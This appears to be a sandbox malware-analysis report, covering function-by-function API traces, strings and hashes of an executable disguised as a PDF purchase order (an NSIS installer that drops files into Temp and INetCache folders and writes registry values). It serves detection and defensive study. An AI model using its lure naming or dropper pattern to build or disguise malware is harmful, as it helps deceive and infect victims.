"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 0040584F
C:\Users\user\AppData\Local\Temp\, xrefs: 00405853

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3073260173
Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi
API String ID: 542301482-4067767340
Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54

Function 00406398 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
FindClose.KERNEL32(00000000), ref: 004063AF

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004038B8

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 0040391F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(Call), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 0040392E, 00403936, 004039D9, 004039DF, 004039EF
C:\Users\user\AppData\Local\Temp\, xrefs: 004038A3
.DEFAULT\Control Panel\International, xrefs: 0040390A
RichEdit, xrefs: 00403AF9
RichEd32, xrefs: 00403ADA
RichEd20, xrefs: 00403ACC
_Nb, xrefs: 00403A22, 00403A8A
"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 004038A1
Control Panel\Desktop\ResourceLocale, xrefs: 004038D2
1033, xrefs: 004038BE, 0040391A
RichEdit20W, xrefs: 00403AEA, 00403AF0
.exe, xrefs: 004039AC
Call, xrefs: 00403966, 0040396F, 0040397D, 004039CC, 004039D2

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-328842823
Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

(*B, xrefs: 00402E7C
soft, xrefs: 00402EDC
Null, xrefs: 00402EE5
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 00402DF4
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Inst, xrefs: 00402ED3
Error launching installer, xrefs: 00402E3E
C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-285992119
Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi,?,?,00000031), ref: 004017CD

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Strings

Call, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi, xrefs: 00401796
C:\Users\user\AppData\Local\Temp\nsiEA09.tmp, xrefs: 00401819, 00401837

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi$C:\Users\user\AppData\Local\Temp\nsiEA09.tmp$C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll$Call
API String ID: 1941528284-546978335
Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

jA, xrefs: 004031F1
... %d%%, xrefs: 0040316E
jA, xrefs: 004030E7

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nsiEA09.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
